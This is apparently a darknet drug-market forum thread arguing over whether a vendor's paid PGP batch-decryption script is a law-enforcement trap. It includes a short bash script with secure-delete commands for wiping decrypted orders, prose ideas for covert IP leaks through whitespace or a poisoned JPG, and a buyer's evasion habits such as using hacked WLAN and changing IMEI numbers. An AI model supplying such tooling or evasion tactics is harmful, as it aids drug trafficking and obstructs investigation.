Ah, fuck it, here's messages.sh which is a very slight variation on the original proof-of-concept shell script which led to me redesigning it in Bash and Python. To use it go to a page with multiple encrypted messages on it (most of your PMs, for example), Control+a, Control+c, open a text file called allmessages.txt, Control+v, save and run the script in the same location.
#!/bin/bash
# Copyright (C) Louis Cyphre, 2012
split -p "-----BEGIN PGP MESSAGE-----" allmessages.txt message
echo "-----BEGIN PGP MESSAGE-----" > pgpmsgbegin.text
for x in `ls message*` ; do
sed '1 c\' $x > $x.txt
done ;
for x in `ls *.txt` ; do
cat pgpmsgbegin.text $x > $x.asc
done
# Decrypt files
gpg --decrypt-files *.asc
# Univeral file deletion (replace with preferred system specific method):
# mv message*.txt /dev/null
# Apple Secure delete:
# srm -fmz message*.txt
# Linux Secure delete (install srm first):
# srm -fD message*.txt
The Python handles writing the *.asc files in a nicer way (better naming for if one needs to be edited before printing, for example) as well as rewriting decrypted data to HTML prior to printing.
possibly with a anonymous bitcoin 'tip jar' available.
The return on that would be insignificant
Whether or not that is true, it is contradictory to claim you want more money, and then target a market so insignificant.
I disagree, it depends on the focus. I'm not expecting that this will make me rich, but a few sales would be nice.
The main issue is that you wanted the big vendors to acquire your software and run it, and that this software was not capable of being audited on this forum, and that even if it was visible, there is still the questions of whether some sneaky side channel attack wouldn't be made since the software relies on downloading new unknown pieces of software, which could easily contain exploits delivered exclusively on those dependencies downloaded through the Tor network.
It has 3 dependencies:
* Python
* GPG
* HTMLDOC (which can be skipped if you don't mind printing plain text or want to use your own method of preparing documents for printing).
I find it difficult to believe the official Python implementation could be backdoored without anyone noticing.
As for GPG, well, if you don't trust that then you're not the platypus I took you for.
Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.
It would still require access to a network.
Indeed, the exploit doesn't necessarily need to even to communicate the IP over the network without the aid of the vendor. The software could cleverly adjust the whitespace count of a PGP plaintext message so that it contained IP address information. Then the LE buyer could extract the IP address directly from the decrypted message. Very simple, very effective, almost impossible to catch on the fly. You wouldn't even need to target the encryption software this way.
I think you're misunderstanding what it does with encrypted data. It's simply writing encrypted messages to multiple files and then calling GPG to decrypt them all simultaneously.
Also, the instructions in the README.txt file include this:
1) Open a terminal and make a temporary directory on an encrypted
volume.
2) Switch to the temporary directory and copy *.sh and *.py to the
temporary directory. Make sure the files are executable:
chmod +x *.py
chmod +x *.sh
...
18) Change directory up one level and securely delete the entire
temporary directory created in the first step using your preferred
file wiping program (e.g. srm or shred).
Oh dear, the copy of the code that is executed gets wiped along with
all of the generated files when you're done. Gosh, how will it manage
to smuggle secret information back to LEOs inserted up the back end of
a ferret now.
To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.
Then don't buy it. I'm not forcing anyone to, it's their choice.
I know that the code will pass any audit, that it does not connect to any other systems from where it is run and does not re-implement OpenPGP (it calls GPG to decrypt multiple files simultaneously using the --decrypt-files flag I mentioned in Peach's thread).
As I mentioned briefly above, there is a multitude of ways of non obvious ways of compromising a system because you're using somebody else's code. Any software dependencies could themselves contain an exploit, and it can be a multi-stage process. It could be the whitespace insertion/removal plaintext encoding trick, replacement of characters with esoteric unicode char synonyms, there's a entire universe of possibilities. Just because pine might not see if pine examines the code personally doesn't mean much either. Exploits are like a magicians magic trick. It's the one thing you don't think of, that makes it seem like an impossibility.
There are far better vector's for attack on this site than a handful of scripts that can be read before their run or run on a disconnected system.
Seriously, if I wanted to do that I'd be planting malicious code in a compressed file that was automatically loaded, like a JPG for example. Put it in an avatar and then make a post attacking a particular vendor to lure that vendor into an argument and force them to load it.
There's more than one way to distribute open source software and it does not require giving it away.
I never disputed that. This is just a way to sidetrack the discussion.
No, I was just under the mistaken impression that you were using the OSI definition of open source.
There is a BIG difference between what is acceptable on a civilian forum, and on a forum of international drug smugglers.
Yes, there is, but I'm not forcing anyone to buy or use this. I am providing a product which some vendors may elect to purchase and use and others may choose not to. It's a free market.
Currently the Python code uses the csv module and basic Python functions, mainly involving lists, reading files and writing new files.
I have already described at least 3 different attacks in this one post alone that you cannot possibly address in your description of what you say is happening because the code is not capable of being properly audited. Any programs from anonymous sources need to be visible on the forum period.
One of which requires network access, which is not required by the program. One involves a false assumption about the use of cryptography in the script (it calls GPG *once* with a decryption command). The last requires planting a backdoor in any of the following: Python (probably already on your system, if it's compromised you're already fucked), Bash (same as Python), GPG (extensively audited already) or HTMLDOC (if you're worried, skip that part).
And again, for emphasis, it doesn't matter if pine cannot figure out where the exploit is hiding. The fact remains that you've made an incredibly incriminating move on these forums. One that would have been blatantly obvious to any IT security professional, and since you have such expertise, you cannot then go and claim ignorance.
For fuck's sake! I can think of sneakier and nasty ways to target this site, if I was really trying to do it then I sure as shit wouldn't have done tried this. See my JPG example above (and do a Google search on "jpg exploit").
The LE accusation only holds true if the code can somehow report on users, which it doesn't.
We really have no way to know that without the code being placed on this forum. Your attitude is from the get-go that we should take your word for it.
And your attitude from the get-go has been completely paranoid, accusatory and frankly offensive. I'm also now convinced that even if and/or when the code is posted to the forums (which frankly I wouldn't trust for a real security audit, with one or two very rare exceptions) that you'd still come up with some reason to stick to your attack.
It can quite easily run on a completely disconnected system. It makes no difference to the program.
Like I said to Sands, this is basically impossible because it's impractical for vendors without appropriate utilization of an Air Gap.
Then they should employ one. Seriously, some old cheap PC with no USB and all the ethernet ports ripped out running a bare minimum install. Data transferred to it via read-only media and no data EVER transferred off it and it's done. How much would it cost using hardware from 6 or 7 years ago? Fifty bucks? A hundred?
Pine, this is the second time you've accused me of being LE based on a misunderstanding of software. The first time was not understanding how GPG verifies signatures. You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.
I did not accuse you of being a LE agent before. I merely stated I had to validate your claims that GPG worked the way you said it did. That was possible in that instance.
Actually you did:
bash-3.2$ ls -l pine-leo1.eml.asc
-rw-r--r-- 1 user staff 1951 Sep 6 07:37 pine-leo1.eml.asc
bash-3.2$ gpg -v pine-leo1.eml.asc
gpg: armor header: Version: GnuPG v2.0.17 (MingW32)
gpg: public key is 0x00ACF6D2D677EF45
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576
You need a passphrase to unlock the secret key for
user: "Louis Cyphre <lcyphre@tormail.org>"
gpg: using subkey 0x00ACF6D2D677EF45 instead of primary key 0x7E8BE6B1DD7B4576
4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
(subkey on main key ID 0x7E8BE6B1DD7B4576)
gpg: encrypted with 4096-bit ELG-E key, ID 0x00ACF6D2D677EF45, created 2012-06-16
"Louis Cyphre <lcyphre@tormail.org>"
gpg: AES256 encrypted data
gpg: original file name=''
bash-3.2$ cat pine-leo1.eml
Hi LC!
Your signed PGP message is invalid! :O
I've tested it with other people's PGP sigs, and the software is working ok.
KeyID: DD7B4576
Status: Key NOT valid
User Name: Louis Cyphre <lcyphre@tormail.org>
So, either signed it wrong or you're LE attempting a threesome :D
Cheers!
Pine
bash-3.2$
So, I re-iterate, this is your second false accusation against me. Unless you're going to deny that you sent me that and to which I responded by explaining how key validity and the web of trust works.
In this instance, it is impossible for me, or anybody else, to validate your claims about this software. That is the single most important fact, and no amount of Cyphere Software Apologists are going to make that go away.
Yet there are ways for anyone who buys it to do so. Not to mention the fact that if it were to fail such an audit they could get my account suspended by SR.
Gladly. Got any other questions I haven't addressed already?
^ Try explaining how 3 different attacks can be addressed using available evidence without us auditing the software on this forum.
A: Simple Bait 'n Switch.
B: Whitespace/character adjustment/replacment to communicate invisible data via the vendors themselves.
C: Software dependency backdoors.
Already done, see above.
And explaining those away still doesn't achieve the main objective you should have had from the onset. There is basically no way to "decriminate" yourself in fact.
Which proves the point I made above, you've made up your mind and there's nothing I can do to change that. As I said, even if I were to post all the code now you'd still think I was up to something.
This is not a court of law, we don't have innocent until proven guilty here. Again, not relying on human trust is the lynchpin of the darknet markets. Everybody is potentially LE agents, some more so than other, since they intend to upload non-audited software anonymously tor big drug dealers online and expect nobody will have a qualm about how sketchy that looks.
If people think I've done something dodgy they don't have to buy it and if they do buy it they don't have to either keep it secret or use it in a way that could reconnect to either the Tor network or the clearnet. It's entirely up to them.
-
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Exactly! Also, I figured that using any other license wouldn't matter if others who receive the code release it anyway, so I selected a license that guarantees other changes be able to be released.
I didn't choose the GPL Affero v3 because that would require publicly releasing every version, including customised ones for specific clients. For example, the version currently available is version 1.1, but version 1.0 doesn't have the code for handling plain text orders only because the vendor who initially contacted me cancels unencrypted orders.
Obviously the GPLv3 does not prevent selling code released under that license. Without going into specifics, I've discussed this with RMS face-to-face, but all this can be confirmed from the Free Software Foundation.
The GPLv3 simply grants certain rights to users and the obligation that the source be made available with the distribution. Since the distribution *is* the source code (Python executables are great like that), then that obligation is covered.
What a complete red herring this is. It wouldn't matter if Linus Torvalds and Bill Gates both signed off on the deal :D
Not really, I was under the mistaken assumption that you were using the commonly accepted definition of open source and/or free software. Instead of your own.
I'm not going to apologise for that.
I admit I didn't notice what particular "license" was being used. And it doesn't matter one fucking jot because source doesn't need be closed in order to contain or be connected to some exploit. It just needs not enough people to be observant enough to catch it in time. That's all it requires. Surely people don't expect that LouisCyphre expected us to be having this discussion...? In his view, a bunch of vendors should have just run his half a dozen or so files without a single quibble.
Actually I didn't, but part of the reason for including vendor support in the price is because I expected to have to show them how to use it securely.
is it even possible to make python programs closed source? What is it, bytecode?
No, it's just .py and .sh scripts which are executable. The closed source claim is a red herring to back up the LE false assumption.
^because pine is le, been trying to tell you guys that.
You're welcome to your opinion, but please hold off on the accusations without proof.
Now you see it, now you don't. Interesting.
[/quote]
I'm not sure what you're referring to here. Spacecase's comment is still in the thread (at least at the time of this post).
As for my comments, my reply to kmfkewm is accurate and my view of false accusations should be abundantly clear.
-
Open source. Licenses. Rules. WTF? We sell fucking drugs here. There are hacked websites and programs and stolen shit galore!
Why would anyone give a crap about proper code license?
I'm sure many won't, but I opted to include it.
-
I think that that your replies makes sense. I guess if people are so paranoid why not let specific members of the forum check the code out? Maybe you should give the code to kmf and he could check it out and comfirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way. Just a suggestion though. To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way. It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.
-
I am guilty of not using semantics appropriately here, nothing more. All the actual facts remain the same. This GPL thing is a distraction from those.
Not intentionally. If you'd said what you meant in the first place then it wouldn't have been an issue, but you were too busy ranting.
You see:
open source and the code is available for everyone here to audit
That is what I meant by open source. That the code was closed source because it could not be analyzed by everybody here independently.
Technically, yes, this is incorrect semantics, code can be open source but not still not viewable to the general public.
If you can't say what you mean, how do you expect anyone to believe that you mean what you say?
Albeit I could argue that defies the spirit of what "open" is supposed to mean, but that's a discussion for a different day. If this were a normal forum, this would be for the birds. It is not, and so it is not.
If you want to pick that fight then go pick it with the Free Software Foundation.
Again, none of the above should have any bearing on this discussion because at *worst* Pine is guilty of being wrong about a technicality or even possibly not knowing a programming language,
A lot more than just one technicality. You've been blatantly making shit up about both me and the code.
and at *best* Louis Cyphere is guilty of being exceptionally naive for a IT security conscious person and abusing the good reputation he's built up by encouraging others to adopt systems that must be insecure by default. And you know the worse case.
Meh. I'm trying to find a balance between financial remuneration for my work and providing a product that is safe to use.
Frankly it doesn't matter whether or not I really am law enforcement or the devil or even a hamster. You can take or leave my posts as you see fit and you can take or leave my products or services as you see fit, just as I can do the same for you and anyone else here. The posts will speak for themselves, as will the code with those people who choose to use it.
-
"Meh. I'm trying to find a balance between financial remuneration for my work and providing a product that is safe to use."
To me this is what a lot of people are disagreeing with. No one seems to believe that you've found that balance. What makes you think the vendors have the skills necessary to tell whether what they get is a safe product? I think that the other posters here are really off base and pine is over exaggerating things but don't you think that there has to be a better possible way to provide your product safely? Hypothetically none of the people buying your software would have the skills necessary to audit it so that giving them the open source code would do absolutely nothing to make things safer. This is why I think that this thread should be more about trying to find a better balance between your financial remuneration and providing a product that is safe to use rather than somewhat childish accusations etc.
In the end the more that you avoid giving actual programmers the code or finding a better solution than "buy it or don't buy it" then the more suspicious this becomes imo. I think both sides agree that it is possible for your software to contain exploits but where you disagree is that you believe that giving the vendors who will be using your product the source code is enough to make things safe whereas few others do.
-
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated. Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC. I'm basing this opinion on what my experience with PGP Club and GPG instruction in other threads and via PMs.
And simultaneously I don't expect anyone pays for your software. If they are not able to audit it they will have no idea if they can trust it and if they can audit it they would just do it themselves. So in the end you will make more with a tip jar than you would with software that people are either too afraid to run or know how to make themselves.
Hmmm, that's the only cogent argument against my current business model. I'll think about it.
There's nothing in the GPL which prevents selling the code under that license. In fact, here's the part of the FAQ which relates to it:
Which might be a valid point, if we were debating about the GPL instead of what is best practice for the people on this forum. As it stands, I couldn't give less of a fuck what license you give the code.
My mistake, I thought Pine was talking about open source as in open source, not "open source" as in "do it my way or I'll make false accusations about you in a public forum."
I can understand that concern too and I share it. There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.
It is completely apples and oranges to compare server and client side code (especially client side code that isn't even contained in a browser). The security implications of SR being run by the feds are far less than the implications of running a python script from the feds.
Uh-huh. So you've got a vendor account and inspected all the code that the vendor's see?
It's possible to compile Python code as a Windows executable, but that's not what this is. I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb. Ridiculous. I'd rather just install Python, if it's not already installed, and run the code.
I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward. I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.
It is possible to make a windows executable out of a Ruby script as well, but it contains the actual script and a ruby interpreter inside of it ;).
Neat trick, but wouldn't it be enormous every time?
The Python version just compiles in C and Python code from all the modules and libs, linked to the relevant DLLs to run on Windows.
I have no real idea, but I wouldn't be surprised if it is the same thing with python. Yeah I also think it is pretty straight forward to reverse engineer bytecode, but I was trying to imagine what a close source python program would look like.
Yeah, I'm not sure what that would be either. So I Googled it and found this (clearnet, obviously):
http://stackoverflow.com/questions/4352866/how-can-i-make-closed-source-portable-python-application
Apparently it can be done, but there are still no guarantees that it won't be reverse engineered. I can't be bothered actually looking into how to obscure code.
I don't know Python
A pity, oh well, I'm sure someone else who does will turn up eventually.
but I do know Ruby and even the .exe's contain the source code in them, they are a cheap gimmick that packages an interpreter and the script into a single executable file.
It is a cheap gimmick, especially since it could still be executing something else. That's why I like the idea of the source being the entire program.
-
Thanks for everyone discussing thee matter.
We have recognized Louis Script yesterday and were interested.
We assume we are pretty good with computing & security in general...but dont know shit about programming.
But we know at least so much that we could see that those Python scripts have a miniscule chance of being an Attack.
Also it is really easily verified . There are a million clearnet forums out there to check this or find ppl to do this.
We still want to to merry pine someday through cryptographical contract :) butt this time she was a little bit to hasty.
Warning of probable malware and advising being cautious is a good thing but directly marking it as malware is not a good move.
Pine and Louis are both great for the community and we dont suspect LEO. even their help is appreciated as with some proper measures it is very very hard to get caught :)
We will order a customized version of the script sometimes in the future ..we long searched for something like this.
What are the probabilites of an Auto - Answer script being developed or feasible? Warweed seems to use something like this.
Cheers
disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
This scripts will only be used in torbox images.
-
Idea for verification->
Let 5 "trusted" members verify the source and publish the MD5 hash.
Do that with every version.
Donate to the members and cyphre. DONATE ENOUGH FOR THEM!
Give away scripts for free.Work together for the good of the community. Public development thread.
-
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If its clean and it works, we will see!
Unfortunately for us all it is not so simple, for the reasons I have posted in my responses, this won't show or prove anything at all.
Only if your assumptions about there being backdoors in every implementation of GPG, release of Bash and release of Python since version 2.3 (when the csv module was added) or in HTMLDOC are correct. You go prove that. I'll wait.
I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern,
I can understand that concern too and I share it. There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.
Haha, wow, what a redirection. Nice try.
Really? I believe kmfkewm has already addressed this, but go and Google:
* html exploit
* css exploit
* cgi exploit
* php exploit
* jpg exploit
To those who think this makes any sense, let me ask you one question. Do you need to download the server side software of SR to your hard drive? No? So how could that possibly exploit you? So you see how ludicrous this statement is.
Uh, you do realise that everything you see is rendered on your system, right?
All that stuff is executed on SR's server, it never touches your machine, so this is completely irrelevant to this discussion. And the information we do download from SR is just HTML and CSS, that in fact is actually open source, just Right Click and select "View Page Source", a webpage just those components cannot contain an exploit for you to worry about because it's not even programming code.
See above search topics and kmfkewm's response to you.
Also, do you have a vendor account to verify that it is the same for them as for buyers?
And if SR indeed did offer up it's server side code as open source, LE would surely be delighted to examine it for weaknesses.
Yes, they would. Which is one of the two most likely reasons it has not been released (the other being competition).
You see, SR *may* use software as a base that is open source in of itself, but this does not imply you should make open source the specific way in which you're making use of the said open source software. It's apples and oranges. If this was a real war, it'd be like the difference between the enemy knowing you have tanks, and the enemy actually knowing the tank placements. Again, LouisCyphre surely already knows this.
Of course I do, I also know that one of the largest vectors for attack is dodgy code on a website.
-
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If its clean and it works, we will see!
now, IF he were LE, then he could release one version of the code into the wild to be audited, while selling another because it "includes support" there would be no way of knowing weather the code being audited is the same as the one being sold.
Well, they could just compare it.
If the code gets posted I won't bother with the current listing, I'll just provide support for it as a service, but if I do that then I'll charge my full professional consulting rate (with adjustments for currency conversion and laundering). By the way, that rate is higher per hour than the price of the current listing. I'm still considering that avenue.
and I agree with kmf that anyone capable of auditing the code is equally capable of writing it,
I've already stated what my code does, there's nothing stopping anyone from writing and releasing their own implementation.
so the market for your "closed" (by pine's definition not having the source before running it) software if only the low hanging fruit, which is notoriously LE's favorite target.
Not quite. The really low hanging fruit is the vendors using Windows systems and I haven't ported it to Windows yet. I'm certainly not inclined to right now.
-
Having read the whole thread through, I think you both (pine & LouisCyphre) do make some very good points. Pine, you are looking out for vendor's operational security, and LouisCyphre, you are looking to make vendor's lives a little more convenient by selling them a digital good. Security Vs. Convenience. As has been proven many, many times in the past the two are on opposite ends of the spectrum, and usually for good reason.
I can completely understand LouisCyphre's reluctance to release the code without somebody paying for it; it would essentially be releasing his work for all and sundry to use without paying him for it. This is an agorist marketplace, and he is under no obligation to release the code in order to sell his product. Those who wish to buy it and check the code for anything malicious are free to do so.
I can also completely understand pine's insistence that the code be released and checked before it is implemented by anyone; this is good security practice, but the fact that this is a product that is for sale by a registered vendor on an agorist marketplace makes this request more than a little unreasonable. People are free to buy and sell any product they wish here, as long as it is not on the restricted items list, including items such as the one that is the subject of this debate and baseless accusation.
Yes, warn vendors to go through the code with a fine-tooth comb should they purchase this item, but that's something that they should be doing anyway with anything that could potentially compromise them. It would do no harm to anyone to post this recommendation, but your statement will likely harm LouisCyphre's business prospects and damage his good reputation in the community. This is essentially slander.
Declaring LouisCyphre as "our resident LE Agent" is incredibly rash of you pine, and defamatory in the extreme; in the interest of fairness I would ask that the thread title be amended to reflect the fact that there is absolutely no evidence to back up this accusation.
You may assert that because he won't release the source code that he must be LE, or malicious in the extreme, but there is absolutely no logic in that at all. He's a creator of a digital item that he wishes to sell on an agorist marketplace, to anybody who wishes to buy it. He is allowed to do that, and has a right to do it without prejudice.
Asserting that he has malicious intent before you've seen the code is outrageous. Whilst I can see where you're coming from and how you arrived at the conclusion that you did, if you feel there is something malicious in what LouisCyphre is offering you are free to purchase it and review the code yourself for peace of mind - just like anybody else.
If you've seen my previous posts you'll know that I'm not one to take sides in an argument. I try to be as neutral as possible, view things objectively and attempt to do so logically.
There have been a lot of unfounded accusations thrown around these forums lately by quite a large number of people; many of these accusations are based on pure conjecture, and that is also the case here as there is no evidence to suggest or back up your claims that LouisCyphre is LE.
If you purchase the code and it does have malicious intent, you can stand behind your claim with proof.
Whilst it is of course possible that the copy you receive may be different than everybody else's, it is terribly foolish to make claims based on pure conjecture, especially claims as serious as this.
- grahamgreene
-
A general point I neglected to mention which may explain some of this situation:
People must understand that DPR isn't necessarily going to be pointing out every possible pitfall and removing them as options. For example, DPR's approach when I brought up the issue of LouisCyphre's program as a security concern for vendors was not "Yes, let's ban him, LE for sure" or "You're probably paranoid, Pine, I mean you think you're a platypus (but this is true)", it was "Go to the forum and have at it, let the vendors themselves decide what is best". This may seem strange, and it did to me at first blush, but I think the general idea, partly at least, is stemming from market based philosophy, is that being overly protective of a market could eventually lead to its downfall if people weren't recognizing 'issues' for themselves, whether or not they got them right or wrong.
That is interesting since DPR already knew what I was doing before I made the listing. He has not (yet) taken me up on my offer to provide a copy of the code for his own peace of mind.
You're right about the agorist philosophy behind his response too. You were asking him to regulate the market, which is the antithesis of what an agorist market is.
-
I agree that this is a bad way to make money for louis and that he should probably just release it open source with a tip jar. I also don't know how many people would buy it either way or even if people would use such software if it was free so this whole thing strikes me as bizarre. It just doesn't make sense to me really but everyone could use some extra cash I guess.
I really doubt the tip jar would get anything more than fragments of BTC. If that were not the case then surely the address in my sig would've received more after certain GPG guides were posted (which are arguably more useful to more people). So arguments from others (Pine and kmfkewm in particular) that that would be a viable income stream is based on a significant overestimation of the generosity of Silk Roadians.
All in all I think louis just didn't think through how this might look to others.
I expected some questions, but I didn't really expect the level of paranoid delusional accusations coming from Pine. I thought s/he/it would like something which made it easier for vendors currently saying no to encrypted orders to be able to use it with greater ease. Clearly I was wrong.
It's so fucking simple in the end: Unless louis releases the code then we can't trust the program and there really isn't anything to it but that in my opinion. So why the long ass posts etc? I mean it's like all of you live in derpaderpistan or something.
It's even simpler than that: If you don't want to use it for whatever reason, don't buy it. If you do, buy it, I'll help you set it up, explain exactly what it does and how, provide best recommendations for secure use and if it turns out I'm fucking with you then you can provide that proof to DPR and he can terminate my account.
-
....all this and I think all its really about is Pine wanting a free copy......just ask sweetheart....just ask....
lol^^ my guess by their posts is that they wouldn't run it on their system if they did but wouldn't it be funny if they did and it turned out to be everything that was promised? i think its kind of been forgotten that Louis created this out of request by another vendor... why doesnt someone just ask the vendor if it works? if they're reputable then it really shouldn't be that hard to trust their answer.
There is a comment posted on the first page of the thread confirming the independent running of the code and that poster was attacked by Pine. Pine did not address the explicit statement that it has been run elsewhere.
LE can't just traffick mass quantities of drugs through the mail using an ordering system via darknet, as much as paranoid people would like to believe this. what kind of police work would that be? sure they could set up a fake vendor account and use a shitload of other fake buyer accounts to create feedback, but don't you think people would catch on if they canceled every REAL order? just saying...
Careful, you might start sounding logical there. ;)
nobody except for Louis seems to have done a really good job of explaining much of anything about this software on this thread so at this point, i'm inclined to believe him more than take anyone else's opinion on it. wouldn't run the software without hearing from the vendor who requested it and used it though.
Thanks.
-
Awesome! I'm no vendor but I want to buy this software and have a looksy inside it's guts!
Go right ahead.
-
I think that that your replies makes sense. I guess if people are so paranoid why not let specific members of the forum check the code out?
It's already been offered to DPR and a fairly major vendor already has it.
Maybe you should give the code to kmf and he could check it out and comfirm that it's safe and then once you sell it to someone kmf could send them the code he got as well and if they are the same then that would be a good way to make sure it is safe and that you don't change it along the way. Just a suggestion though.
Kmf has already said he uses Ruby, not Python. So I'd need to find someone else here whose Python skills I trust.
To me although what you've said makes sense it's really up to you to guarantee the safety of your software completely in some way. It doesn't seem like an impossible task to me even if you don't want to give it to the public for free, but I guess I could be wrong there.
It's a matter of trust. Sure I could send a copy to kmfkewm and a copy to Pine and say, go speak to people you know and verify it. Can you guess what will happen then? They'll post it to the forum and tell me to suck it (if I were to bet on it, I reckon Pine would post first).
Now can you guess what happens after that?
1) I will be proven right (eventually).
2) We will discover that there really aren't as many people capable of auditing it properly as Pine might think.
3) My "tip jar" in my signature will receive sweet fuck all and I can go back to the drawing board.
-
"Meh. I'm trying to find a balance between financial remuneration for my work and providing a product that is safe to use."
To me this is what a lot of people are disagreeing with. No one seems to believe that you've found that balance.
Either that or they just want free stuff. It's funny, no one seems to think it's unfair if a drug vendor refuses to provide a sample, but I have to provide the entire product.
What makes you think the vendors have the skills necessary to tell whether what they get is a safe product?
A line-by-line explanation of precisely what everything does, with links to Python documentation and sample code for verification should suffice. Seriously, if they can follow my instructions for using GPG on the command line then they will be able to follow this.
I think that the other posters here are really off base and pine is over exaggerating things but don't you think that there has to be a better possible way to provide your product safely?
Better than the above? Not while still getting paid or without revealing my real identity.
Hypothetically none of the people buying your software would have the skills necessary to audit it so that giving them the open source code would do absolutely nothing to make things safer.
The method I just described might help.
This is why I think that this thread should be more about trying to find a better balance between your financial remuneration and providing a product that is safe to use rather than somewhat childish accusations etc.
Look, if you can think of something better, I'm listening.
In the end the more that you avoid giving actual programmers the code or finding a better solution than "buy it or don't buy it" then the more suspicious this becomes imo.
I know some very good Python developers I'd trust to audit it, but to my knowledge they're not on Silk Road. They certainly don't know that I am and I'd really like to keep it that way.
I think both sides agree that it is possible for your software to contain exploits but where you disagree is that you believe that giving the vendors who will be using your product the source code is enough to make things safe whereas few others do.
In conjunction with a thorough explanation with proof that I can't fake.
-
I want to thank Pine for explaining how exploits are hidden in code in such a way as to not be found, like I was in kindergarden, and typing in my first commands in Basic on a Commadore pet. incredibly presumptuous of you. I know quite a bit about coding and exploits, and have participated in and planned a few black hat events in my day. As for understanding code, ...do you actually think that everyone on here uses the Vidalia tor browser bundle to connect to SR? nope. Coded my own client to work more efficiently, hence the reason I am *almost* never bothered with the timeouts. Your tin foil hat paranoia could have easily been avoided, (along with all the unnecessary FUD you probably created amongst the n00bs, by simply addressing these issues in a fucking PM. @Louis, I do not have much in my account, just over a coin after I placed my orders for the week, but consider it my contribution to your tip jar...I for one am suspect at the true motive of pine in ranting like a crazy woman even AFTER her concerns were addressed. Now that the code is up, zhe is mysteriously silent. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine? ..........sickgirl
-
Thanks for everyone discussing thee matter.
We have recognized Louis Script yesterday and were interested.
We assume we are pretty good with computing & security in general...but dont know shit about programming.
But we know at least so much that we could see that those Python scripts have a miniscule chance of being an Attack.
Thanks.
Also it is really easily verified . There are a million clearnet forums out there to check this or find ppl to do this.
Yep. Not to mention a lot of documentation on places like python.org and diveintopython.net.
We still want to to merry pine someday through cryptographical contract :) butt this time she was a little bit to hasty.
Warning of probable malware and advising being cautious is a good thing but directly marking it as malware is not a good move.
This is appreciated.
Pine and Louis are both great for the community and we dont suspect LEO. even their help is appreciated as with some proper measures it is very very hard to get caught :)
Cheers. I don't actually think s/he is either.
We will order a customized version of the script sometimes in the future ..we long searched for something like this.
I look forward to that. :)
What are the probabilites of an Auto - Answer script being developed or feasible? Warweed seems to use something like this.
If there were an API it would be dead simple. There isn't. It should still be possible to use HTTP-Post to interact with the pages. I presume that's what Warweed does, with an always on system, constantly logged in to check the orders page every minute and then respond with a PM once an order is recognised.
Unless, of course, Warweed is actually a vendor account created by SR staff and can run directly on the system. I think it's the former, though, because the recent academic report on SR confirmed that a session ID could be used by a bot to crawl the site. Whoever is running Warweed just needs to login as normal occasionally and update the session ID used by his or her script.
disclaimer: we use prepaid international SIM , change IMEI numbers, throw away phones and hacked WLAN for access to the site.
This scripts will only be used in torbox images.
Cool.
-
Well, your explanations make sense to me and I think everyone here appreciates you taking so much of your time to respond in such depth. Anyway, I think that your comparison to drug dealers is a little inconsistent because new vendors usually have to give out samples and/or provide proof that their products are safe such as reagent tests etc. in order to gain customers. You say you will give step by step instructions/explanations to purchasers but couldn't you hypothetically lie whenever you wanted to in that? So again, I just don't think you've done enough to prove that your program is safe. I can't think of anything better other than releasing it for free or handing it to people who could check it out(and these people may not exist on sr) but maybe someone can. Honestly I do doubt that it has any exploits and I don't really know enough about programming to judge everything in your posts so maybe everything in this thread is just paranoid ranting about exploits that really aren't plausible. But if it is at all possible it's better to stay safe though no?
"Now can you guess what happens after that?
1) I will be proven right (eventually).
2) We will discover that there really aren't as many people capable of auditing it properly as Pine might think.
3) My "tip jar" in my signature will receive sweet fuck all and I can go back to the drawing board."
Personally this would be my guess as well but in the end all I have at the moment is an educated guess and for me that isn't enough.
-
I just don't think you've done enough to prove that your program is safe. I can't think of anything better other than releasing it for free or handing it to people who could check...
He did. Reread the posts. He released the source/scripts. What more do you want? What more does he have to do? It is there, on the board, in this thread, ready to be examined and vetted by anyone who would like. *facepalm*
-
@Louis, I do not have much in my account, just over a coin after I placed my orders for the week, but consider it my contribution to your tip jar...I for one am suspect at the true motive of pine in ranting like a crazy woman even AFTER her concerns were addressed. Now that the code is up, zhe is mysteriously silent. Nothing like running to the forum and screaming LE! LE! LE! for teh lulz, eh, Pine? ..........sickgirl
Cheers. :)
Although I should mention that the bash script is just what I whipped up in a couple of hours (well, 3) and served as the proof-of-concept prior to coding SROPPy. It also uses the BSD version of split with pattern matching, which the Linux version apparently lacks.
SROPPy took a few days with correspondence with the vendor and trying a few different things. It's cleaner and includes code to work with unencrypted address data. The Python code and use of the csv module made the split component of the script unnecessary.
The irony is that the bash script could make Pine's life easier with PGP Club if she deigns to use it (assuming she has BSD's split and not Linux's one).
-
Well, your explanations make sense to me and I think everyone here appreciates you taking so much of your time to respond in such depth.
As GrahamGreene pointed out, I'm being slandered left and right here. I don't really have a choice except to make time.
Anyway, I think that your comparison to drug dealers is a little inconsistent because new vendors usually have to give out samples and/or provide proof that their products are safe such as reagent tests etc. in order to gain customers.
